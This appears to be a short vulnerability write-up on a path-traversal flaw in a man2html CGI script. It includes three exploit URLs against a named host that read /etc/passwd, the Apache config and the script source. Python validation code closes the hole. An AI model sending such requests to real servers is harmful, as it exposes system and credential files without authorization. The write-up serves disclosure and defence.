= Synopsis =

[code]
http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=man
[/code]

Look for the paragraph that reads:

[code]
However, if name contains a slash (/) then man interprets it as a file specification, so that you can do man ./foo.5 or even man /cd/foo/bar.1.gz.
[/code]

= Description =

[code]
http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/passwd
http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/httpd/conf/httpd.conf
http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/var/www/cgi-bin/man2html
[/code]

It looks like there was an attempt to sanitize cgi_section but not cgi_command. It also looks like the script was hacked on a bit, so the sanitization may have been there at one point and been removed later.
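
One way to validate both parameters before they reach man, as an added example that is not the man2html script's own code. The function name build_man_argv and the two allowlist patterns are assumptions made for illustration; the sample query strings in the checks are constructed from the parameters shown above.

```python
import re
from urllib.parse import parse_qs

# Assumed allowlists (not from the original script): page names and section
# labels built only from characters that cannot form a file specification.
NAME_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.+:-]{0,63}")
SECTION_RE = re.compile(r"[0-9][A-Za-z]{0,3}|[nl]")


def build_man_argv(query_string):
    """Return an argv list for man, or None if the request must be refused.

    parse_qs percent-decodes the values, so %2F is seen as '/' before the
    check runs. Both parameters are validated, not just cgi_section.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    names = params.get("cgi_command", [])
    sections = params.get("cgi_section", [])
    # Refuse repeated parameters: a second value could slip past a check
    # that only looks at the first one.
    if len(names) != 1 or len(sections) > 1:
        return None
    name = names[0]
    if not NAME_RE.fullmatch(name):
        return None  # empty, contains '/', or starts with '-' or '.'
    argv = ["man"]
    if sections and sections[0] != "":
        if not SECTION_RE.fullmatch(sections[0]):
            return None
        argv.append(sections[0])
    argv.append(name)
    # Hand this list to subprocess.run(argv); never build a shell string.
    return argv
```

Because the name pattern has no slash, man never takes its file-specification branch, and because the first character cannot be a hyphen, the value cannot be read as an option.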